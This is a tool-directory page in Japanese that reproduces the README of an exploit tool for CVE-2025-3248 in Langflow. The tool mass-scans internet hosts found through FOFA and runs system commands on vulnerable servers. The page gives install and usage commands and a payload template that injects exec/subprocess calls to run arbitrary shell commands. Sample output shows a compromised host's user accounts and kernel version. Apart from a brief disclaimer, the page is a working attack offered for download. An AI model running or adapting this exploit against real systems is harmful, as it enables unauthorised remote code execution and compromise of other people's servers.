Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-3248 — Langflow アプリケーションにおける CVE-2025-3248 の脆弱性スキャナー。 | Kitploit
ツール/GitHubGitHub/xuemian168/cve-2025-3248
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集コマンド&コントロール
GitHubxuemian168/cve-2025-3248

CVE-2025-3248

Langflow アプリケーションにおける CVE-2025-3248 の脆弱性スキャナー。

リポジトリを見る
10271年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

中文 | English

Langflow 脆弱性スキャナ

Langflow アプリケーションにおける CVE-2025-3248 の脆弱性スキャナです。

特徴

  • FOFA を使用した単一ターゲットまたは複数ターゲットのスキャン
  • 脆弱性のあるターゲット上でのシステムコマンド実行
  • システム情報の取得
  • カスタムペイロードのサポート
  • FOFA スキャン用のプログレスバー
  • 美しい CLI インターフェース

インストール

  1. リポジトリをクローンします:
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
  1. 依存関係をインストールします:
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
  1. 環境ファイルを編集します(オプション)
# After you finish editing
mv .env.example .env

使用方法

単一ターゲットのスキャン

python main.py -t https://target.com

FOFA API の使用

python main.py --fofa-email [email protected] --fofa-key your_api_key

その他のオプション

  • -t, --target: スキャンするターゲット URL
  • --fofa-email: FOFA API のメールアドレス
  • --fofa-key: FOFA API キー
  • --fofa-query: FOFA 検索クエリ(デフォルト: 'app="LOGSPACE-LangFlow"')
  • --country: 国コードで結果をフィルタリング(例: CN、US)
  • --max-pages: 取得する FOFA ページの最大数(デフォルト: 5)
  • --page-size: 1 ページあたりの結果数(デフォルト: 100)
  • --timeout: リクエストのタイムアウト(秒)(デフォルト: 10)
  • --no-verify: SSL 検証を無効化
  • --threads: 並行スキャンのスレッド数(デフォルト: 5)
  • -f, --file: ペイロードとして使用するカスタム Python ファイル

カスタムペイロード

Python ファイルを作成してカスタムペイロードを作成できます:

def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
    pass

次に、以下のように使用します:

python main.py -t https://target.com -f your_payload.py

出力例

    [+] User Accounts:
        root            UID:0      GID:0      Home:/root                Shell:/bin/bash
        daemon          UID:1      GID:1      Home:/usr/sbin            Shell:/usr/sbin/nologin
        bin             UID:2      GID:2      Home:/bin                 Shell:/usr/sbin/nologin
        sys             UID:3      GID:3      Home:/dev                 Shell:/usr/sbin/nologin
        sync            UID:4      GID:65534  Home:/bin                 Shell:/bin/sync
        games           UID:5      GID:60     Home:/usr/games           Shell:/usr/sbin/nologin
        man             UID:6      GID:12     Home:/var/cache/man       Shell:/usr/sbin/nologin
        lp              UID:7      GID:7      Home:/var/spool/lpd       Shell:/usr/sbin/nologin
        mail            UID:8      GID:8      Home:/var/mail            Shell:/usr/sbin/nologin
        news            UID:9      GID:9      Home:/var/spool/news      Shell:/usr/sbin/nologin
        uucp            UID:10     GID:10     Home:/var/spool/uucp      Shell:/usr/sbin/nologin
        proxy           UID:13     GID:13     Home:/bin                 Shell:/usr/sbin/nologin
        www-data        UID:33     GID:33     Home:/var/www             Shell:/usr/sbin/nologin
        backup          UID:34     GID:34     Home:/var/backups         Shell:/usr/sbin/nologin
        list            UID:38     GID:38     Home:/var/list            Shell:/usr/sbin/nologin
        irc             UID:39     GID:39     Home:/run/ircd            Shell:/usr/sbin/nologin
        _apt            UID:42     GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        nobody          UID:65534  GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        user            UID:1000   GID:0      Home:/app/data            Shell:/bin/sh
    [+] System Details:
        Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux

免責事項

⚠️ 免責事項 このツールは合法的な目的のみで使用してください。教育目的、社内のエンタープライズセキュリティテスト、または許可された環境での使用を目的として設計されています。許可されていないシステム、ネットワーク、またはデバイスでこのツールを使用することは固く禁止されており、関連する法律や規制に違反する可能性があります。

ユーザーは自身の行為に対して全法的責任を負うものとします。作者および貢献者は、このツールの不適切な使用によって生じたいかなる損失、データ漏洩、または法的結果についても責任を負いません。

⚠️ 違法な攻撃に使用しないでください。許可されていないシステムにこのツールを展開または実行しようとしないでください。

参照

  • https://github.com/langflow-ai/langflow/releases/tag/1.3.0
  • https://github.com/langflow-ai/langflow/pull/6911
  • https://www.cve.org/cverecord?id=CVE-2025-3248

ライセンス

MIT ライセンス

ツールをダウンロード